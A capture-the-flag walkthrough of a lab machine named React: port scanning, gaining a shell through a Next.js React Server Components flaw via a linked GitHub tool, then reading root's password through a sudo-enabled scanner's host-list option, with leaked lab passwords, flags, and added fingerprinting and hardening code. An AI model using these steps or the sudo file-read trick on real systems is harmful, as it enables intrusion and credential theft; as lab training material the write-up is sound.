React

Target Notes

  • QQ group: 660930334

I. Information Gathering

1. Host Discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 15:15 CST
Nmap scan report for 192.168.2.1
Host is up (0.00068s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00031s latency).
MAC Address: 08:00:27:59:EA:A8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.27
Host is up (0.00062s latency).
MAC Address: 08:00:27:40:AA:43 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.18 seconds

Target IP: 192.168.2.27 (the only VirtualBox NIC on the segment besides 192.168.2.2)

2. Port Scanning

(1) Full-port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.27
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 15:15 CST
Nmap scan report for 192.168.2.27
Host is up (0.00066s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
MAC Address: 08:00:27:40:AA:43 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.77 seconds

Open ports: 22, 80, 3000

(2) Service and version scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,3000 192.168.2.27
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 15:16 CST
Nmap scan report for 192.168.2.27
Host is up (0.00054s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: \xE7\xBD\x91\xE7\xBB\x9C\xE8\xAF\x8A\xE6\x96\xAD\xE5\xB7\xA5\xE5\x85\xB7
|_http-server-header: Apache/2.4.62 (Debian)
3000/tcp open ppp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch, Accept-Encoding
| x-nextjs-cache: HIT
| x-nextjs-prerender: 1
| x-nextjs-stale-time: 4294967294
| X-Powered-By: Next.js
| Cache-Control: s-maxage=31536000,
| ETag: "vhwrqricd17bt"
| Content-Type: text/html; charset=utf-8
| Content-Length: 9497
| Date: Tue, 16 Dec 2025 07:16:30 GMT
| Connection: close
| <!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" as="image" href="/next.svg"/><link rel="stylesheet" href="/_next/static/css/97f208c543225968.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-744ee3f145013e34.js"/><script src="/_next/static/chunks/4bd1b696-6985518451956beb.js" async=""></script><script src="/_next/static/chunks/215-
| HTTPOptions, RTSPRequest:
| HTTP/1.1 400 Bad Request
| vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch
| Allow: GET
| Allow: HEAD
| Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
| Date: Tue, 16 Dec 2025 07:16:30 GMT
| Connection: close
| Help, NCP:
| HTTP/1.1 400 Bad Request
|_ Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94SVN%I=7%D=12/16%Time=6941074F%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,26A9,"HTTP/1\.1\x20200\x20OK\r\nVary:\x20RSC,\x20Next-Rout
SF:er-State-Tree,\x20Next-Router-Prefetch,\x20Next-Router-Segment-Prefetch
SF:,\x20Accept-Encoding\r\nx-nextjs-cache:\x20HIT\r\nx-nextjs-prerender:\x
SF:201\r\nx-nextjs-stale-time:\x204294967294\r\nX-Powered-By:\x20Next\.js\
SF:r\nCache-Control:\x20s-maxage=31536000,\x20\r\nETag:\x20\"vhwrqricd17bt
SF:\"\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x
SF:209497\r\nDate:\x20Tue,\x2016\x20Dec\x202025\x2007:16:30\x20GMT\r\nConn
SF:ection:\x20close\r\n\r\n<!DOCTYPE\x20html><html\x20lang=\"en\"><head><m
SF:eta\x20charSet=\"utf-8\"/><meta\x20name=\"viewport\"\x20content=\"width
SF:=device-width,\x20initial-scale=1\"/><link\x20rel=\"preload\"\x20as=\"i
SF:mage\"\x20href=\"/next\.svg\"/><link\x20rel=\"stylesheet\"\x20href=\"/_
SF:next/static/css/97f208c543225968\.css\"\x20data-precedence=\"next\"/><l
SF:ink\x20rel=\"preload\"\x20as=\"script\"\x20fetchPriority=\"low\"\x20hre
SF:f=\"/_next/static/chunks/webpack-744ee3f145013e34\.js\"/><script\x20src
SF:=\"/_next/static/chunks/4bd1b696-6985518451956beb\.js\"\x20async=\"\"><
SF:/script><script\x20src=\"/_next/static/chunks/215-")%r(Help,2F,"HTTP/1\
SF:.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(NCP,2F,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r
SF:(HTTPOptions,10C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nvary:\x20RSC,\x
SF:20Next-Router-State-Tree,\x20Next-Router-Prefetch,\x20Next-Router-Segme
SF:nt-Prefetch\r\nAllow:\x20GET\r\nAllow:\x20HEAD\r\nCache-Control:\x20pri
SF:vate,\x20no-cache,\x20no-store,\x20max-age=0,\x20must-revalidate\r\nDat
SF:e:\x20Tue,\x2016\x20Dec\x202025\x2007:16:30\x20GMT\r\nConnection:\x20cl
SF:ose\r\n\r\n")%r(RTSPRequest,10C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:vary:\x20RSC,\x20Next-Router-State-Tree,\x20Next-Router-Prefetch,\x20Ne
SF:xt-Router-Segment-Prefetch\r\nAllow:\x20GET\r\nAllow:\x20HEAD\r\nCache-
SF:Control:\x20private,\x20no-cache,\x20no-store,\x20max-age=0,\x20must-re
SF:validate\r\nDate:\x20Tue,\x2016\x20Dec\x202025\x2007:16:30\x20GMT\r\nCo
SF:nnection:\x20close\r\n\r\n");
MAC Address: 08:00:27:40:AA:43 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8, Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.01 seconds
  1. Port 22: SSH (OpenSSH 8.4p1, Debian 11)
  2. Port 80: HTTP (Apache 2.4.62; the escaped http-title decodes to 网络诊断工具, "Network Diagnostic Tool")
  3. Port 3000: Next.js. nmap labels it "ppp?" only because 3000 is mapped to ppp in its services table; the probe response is plainly HTTP, and the Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch headers identify the Next.js App Router with React Server Components.
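To show how the port-3000 fingerprint above is read, here is an added example (not code from the writeup or from any tool it links) that parses a raw HTTP response and flags the Next.js App Router / React Server Components markers nmap printed: X-Powered-By: Next.js, the x-nextjs-* cache headers, /_next/static/ asset paths and, most relevant for React2Shell triage, the Vary: RSC, Next-Router-* negotiation headers. The two sample responses are constructed from the headers shown above; the header list and the evidence strings are our own heuristics.

```python
"""Fingerprint a Next.js App Router (React Server Components) host from a raw
HTTP/1.x response, the way the nmap probe output on port 3000 is read by hand.

Added example for this writeup; not part of the React2Shell scanner or the
exploit tool.  Sample responses are constructed from the headers nmap showed.
"""
from __future__ import annotations

from dataclasses import dataclass, field

# Vary tokens that only the App Router emits while negotiating RSC payloads.
# A Pages Router-only deployment never advertises them (our heuristic).
RSC_VARY_TOKENS = {"rsc", "next-router-state-tree", "next-router-prefetch"}


@dataclass
class Fingerprint:
    is_nextjs: bool = False
    app_router_rsc: bool = False
    evidence: list[str] = field(default_factory=list)


def parse_response(raw: str) -> tuple[int, dict[str, str], str]:
    """Split a raw HTTP/1.x response into (status, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        # Header names are case-insensitive: nmap printed both 'Vary' and 'vary'.
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def fingerprint(raw: str) -> Fingerprint:
    """Collect Next.js markers; app_router_rsc is the React2Shell-relevant bit."""
    _status, headers, body = parse_response(raw)
    fp = Fingerprint()
    if headers.get("x-powered-by", "").lower().startswith("next.js"):
        fp.is_nextjs = True
        fp.evidence.append("X-Powered-By: Next.js")
    if any(h.startswith("x-nextjs-") for h in headers):
        fp.is_nextjs = True
        fp.evidence.append("x-nextjs-* cache headers present")
    if "/_next/static/" in body:
        fp.is_nextjs = True
        fp.evidence.append("/_next/static/ asset paths in body")
    vary = {t.strip().lower() for t in headers.get("vary", "").split(",")}
    if RSC_VARY_TOKENS & vary:
        fp.app_router_rsc = True
        fp.evidence.append("Vary lists RSC / Next-Router-* headers (App Router)")
    return fp


# Constructed from the port-3000 probe above (body cut to the part nmap showed).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, "
    "Next-Router-Segment-Prefetch, Accept-Encoding\r\n"
    "x-nextjs-cache: HIT\r\n"
    "X-Powered-By: Next.js\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    '<!DOCTYPE html><html lang="en"><head><link rel="stylesheet" '
    'href="/_next/static/css/97f208c543225968.css"/></head></html>'
)

# Constructed stand-in for the Apache service on port 80: no Next.js markers.
APACHE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.62 (Debian)\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><head><title>x</title></head></html>"
)

if __name__ == "__main__":
    for name, raw in (("port 3000", SAMPLE_RESPONSE), ("port 80", APACHE_RESPONSE)):
        fp = fingerprint(raw)
        print(f"{name}: nextjs={fp.is_nextjs} app_router_rsc={fp.app_router_rsc} {fp.evidence}")
```

Against a live host you would feed it the bytes of a real GET / response. A positive RSC fingerprint says only that the App Router is exposed, not that the host is vulnerable; a version check or a safe-check probe is still needed before calling it exploitable.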

II. Exploiting Next.js

Go straight for a ready-made tool.
Next.js exploit tool: https://github.com/Rsatan/Next.js-Exploit-Tool

The target's own /opt/react2shell/scanner.py (seen in the privilege-escalation section) is assetnote's React2Shell scanner, so the React Server Components remote-code-execution flaw known as React2Shell is the intended entry point on port 3000; the Vary: RSC headers in the nmap output confirm an App Router deployment. As with any exploit pulled from a third-party GitHub repository, read the code before running it: a tool that phones home or drops a second payload compromises the tester's host as well as the target.

The tool returns a reverse shell directly.

III. Shell as bot

Shell obtained:

bot@React:/opt/target$ id
uid=1000(bot) gid=1000(bot) groups=1000(bot)

IV. Privilege Escalation

The bot user's password is sitting in /opt/target/start.sh: lMmqr98vg3Ke1Mu4hJwN

Connecting over SSH with it fails with "Host key verification failed": known_hosts already holds a different key for 192.168.2.27, most likely from an earlier VM that used the same lab address. In a lab that is expected; against a production host this warning is exactly the man-in-the-middle signal it says it is and must be investigated, not deleted.

┌──(root㉿kali)-[~]
└─# ssh bot@192.168.2.27
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ED25519 key sent by the remote host is
SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending ED25519 key in /root/.ssh/known_hosts:4
remove with:
ssh-keygen -f '/root/.ssh/known_hosts' -R '192.168.2.27'
Host key for 192.168.2.27 has changed and you have requested strict checking.
Host key verification failed.

Remove the stale entry with ssh-keygen:

┌──(root㉿kali)-[~]
└─# ssh-keygen -R 192.168.2.27
# Host 192.168.2.27 found: line 4
/root/.ssh/known_hosts updated.
Original contents retained as /root/.ssh/known_hosts.old

Reconnect. The ED25519 fingerprint offered, SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ, is the same one the warning reported, and it is already known under many other hashed names, which fits a reused lab image rather than an interception:

┌──(root㉿kali)-[~]
└─# ssh bot@192.168.2.27
The authenticity of host '192.168.2.27 (192.168.2.27)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:4: [hashed name]
~/.ssh/known_hosts:6: [hashed name]
~/.ssh/known_hosts:7: [hashed name]
~/.ssh/known_hosts:12: [hashed name]
~/.ssh/known_hosts:13: [hashed name]
~/.ssh/known_hosts:14: [hashed name]
~/.ssh/known_hosts:15: [hashed name]
~/.ssh/known_hosts:16: [hashed name]
(20 additional names omitted)
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.27' (ED25519) to the list of known hosts.
bot@192.168.2.27's password:
Linux React 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
bot@React:~$

Check sudo -l:

bot@React:/opt/target$ sudo -l
Matching Defaults entries for bot on React:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bot may run the following commands on React:
(ALL) NOPASSWD: /opt/react2shell/scanner.py
(ALL) NOPASSWD: /usr/bin/rm -rf /

Leave the /usr/bin/rm -rf / entry alone; it is a trap, not an escalation path. Look at how scanner.py is used:

bot@React:~$ sudo /opt/react2shell/scanner.py -h
usage: scanner.py [-h] (-u URL | -l LIST) [-t THREADS] [--timeout TIMEOUT] [-o OUTPUT] [--all-results] [-k] [-H HEADER] [-v] [-q]
[--no-color] [--safe-check] [--windows] [--waf-bypass] [--waf-bypass-size KB]

React2Shell Scanner

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Single URL/host to check
-l LIST, --list LIST File containing list of hosts (one per line)
-t THREADS, --threads THREADS
Number of concurrent threads (default: 10)
--timeout TIMEOUT Request timeout in seconds (default: 10)
-o OUTPUT, --output OUTPUT
Output file for results (JSON format)
--all-results Save all results to output file, not just vulnerable hosts
-k, --insecure Disable SSL certificate verification
-H HEADER, --header HEADER
Custom header in 'Key: Value' format (can be used multiple times)
-v, --verbose Verbose output (show response snippets for vulnerable hosts)
-q, --quiet Quiet mode (only show vulnerable hosts)
--no-color Disable colored output
--safe-check Use safe side-channel detection instead of RCE PoC
--windows Use Windows PowerShell payload instead of Unix shell
--waf-bypass Add junk data to bypass WAF content inspection (default: 128KB)
--waf-bypass-size KB Size of junk data in KB for WAF bypass (default: 128)

Examples:
scanner.py -u https://example.com
scanner.py -l hosts.txt -t 20 -o results.json
scanner.py -l hosts.txt --threads 50 --timeout 15
scanner.py -u https://example.com -H "Authorization: Bearer token" -H "User-Agent: CustomAgent"

The -l option reads a host list from a file. Because sudo runs the script as root, any root-readable file can be handed over as the "list"; each line becomes a hostname and, when resolution fails, is reflected verbatim into the connection-error message. That turns the scanner into an arbitrary file read as root. -o writes results to a file and --all-results includes non-vulnerable hosts in that output.

There is also an interesting binary, /usr/bin/check_key; strings shows what it copies:

bot@React:~$ strings /usr/bin/check_key
....
cp /root/Reactrootpass.txt /opt
....

So a file /root/Reactrootpass.txt exists. Read it through the scanner:

bot@React:/opt$ sudo /opt/react2shell/scanner.py -l /root/Reactrootpass.txt -o /tmp/3.txt --all-results

brought to you by assetnote

[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled

[ERROR] To75CuOTHLA7BMmH5Puv - Connection Error: HTTPSConnectionPool(host='to75cuothla7bmmh5puv', port=443): Max retries exceeded with url: / (Caused by NameResolutionError("HTTPSConnection(host='to75cuothla7bmmh5puv', port=443): Failed to resolve 'to75cuothla7bmmh5puv' ([Errno -3] Temporary failure in name resolution)"))

============================================================
SCAN SUMMARY
============================================================
Total hosts scanned: 1
Vulnerable: 0
Not vulnerable: 1
Errors: 0
============================================================

[+] Results saved to: /tmp/3.txt

The "host" in the ERROR line is the file's content: To75CuOTHLA7BMmH5Puv. Note that the summary still reports "Not vulnerable: 1" and "Errors: 0" even though a connection error was printed, so the scanner's counters say nothing about whether the read succeeded; the reflected ERROR line does.
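The two points of the escalation above, the root file read through -l and the leak through the error message, are reproduced below in an added example that is not the React2Shell scanner's code (its internals are not shown on the page) and is not part of the writeup. The unsafe functions mirror only the behaviour the scan output demonstrates; the hardened loader shows what a script granted via sudoers should have done. All paths and file contents are constructed for the demo.

```python
"""Why `sudo scanner.py -l FILE` is a root file-read primitive, and what a
hardened host-list loader looks like.

Added example for this writeup.  Not the React2Shell scanner's code; the
unsafe functions only mirror the behaviour visible in the scan output above.
Directory and file names below are constructed for the demo.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# RFC 1123-style hostname check.  A 20-character random password such as the
# one leaked above passes it, so syntax validation alone cannot stop the leak.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.I,
)


def load_hosts_unsafe(path: str) -> list[str]:
    """Mirror of the vulnerable pattern: open whatever path the caller names.
    Under `sudo` that is every file root can read."""
    with open(path) as fh:
        return [line.strip() for line in fh if line.strip()]


def error_unsafe(host: str, exc: Exception) -> str:
    """Mirror of the leaky pattern: the raw 'host' (a line of the file) is
    reflected into the error message, as in the [ERROR] line above."""
    return f"[ERROR] {host} - Connection Error: {exc}"


def load_hosts_safe(path: str, allowed_dir: str) -> list[str]:
    """Hardened loader: the list must resolve (symlinks and '..' included)
    to a regular file under allowed_dir, and every line must look like a
    hostname.  Bad lines are reported by number only, never by content."""
    base = Path(allowed_dir).resolve()
    target = Path(path).resolve()
    if base not in target.parents:
        raise PermissionError(f"host list must be under {base}")
    if not target.is_file():
        raise PermissionError("host list must be a regular file")
    hosts: list[str] = []
    for lineno, line in enumerate(target.read_text().splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        if not HOST_RE.match(line):
            raise ValueError(f"line {lineno}: not a valid hostname")
        hosts.append(line)
    return hosts


def error_safe(index: int, exc_type: type) -> str:
    """Error output that names the entry position and failure class only."""
    return f"[ERROR] host #{index} - {exc_type.__name__}"


def demo() -> dict[str, object]:
    """Run both loaders against a constructed 'secret' file that lives outside
    the allowed directory, and return what each of them yields."""
    with tempfile.TemporaryDirectory() as tmp:
        lists_dir = Path(tmp, "lists")
        lists_dir.mkdir()
        secret = Path(tmp, "Reactrootpass.txt")        # stand-in for /root/Reactrootpass.txt
        secret.write_text("To75CuOTHLA7BMmH5Puv\n")     # constructed content
        (lists_dir / "hosts.txt").write_text("example.com\nlocalhost\n")

        leaked = load_hosts_unsafe(str(secret))
        leak_msg = error_unsafe(leaked[0], OSError("name resolution failed"))
        try:
            load_hosts_safe(str(secret), str(lists_dir))
            blocked = False
        except PermissionError:
            blocked = True
        ok = load_hosts_safe(str(lists_dir / "hosts.txt"), str(lists_dir))
        return {
            "leaked": leaked,
            "leak_msg": leak_msg,
            "blocked": blocked,
            "ok": ok,
            "secret_looks_like_host": bool(HOST_RE.match("To75CuOTHLA7BMmH5Puv")),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

demo() returns the leaked line, the leaky error message, whether the hardened loader refused the out-of-tree path, and the fact that the leaked password passes the hostname check. That last point matters: line validation cannot tell a random password from a hostname, so the defence is the path restriction plus not reflecting raw input into errors, and the real fix is to not grant NOPASSWD sudo to a network scanner at all.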

Use it as the root password:

bot@React:/opt$ su root
Password:
root@React:/opt# id
uid=0(root) gid=0(root) groups=0(root)

V. Flags

root@React:/opt# cat /root/root.txt /home/bot/user.txt 
flag{root-bc29a7159b63b18dc294002be32e1c22}
flag{user-4bb58d8876c0423d7f759a4d2dfa9cac}

React: http://miao-sec.github.io/Maze-sec/React/
Author: Miao
Published: January 9, 2026
License: BY-MIAO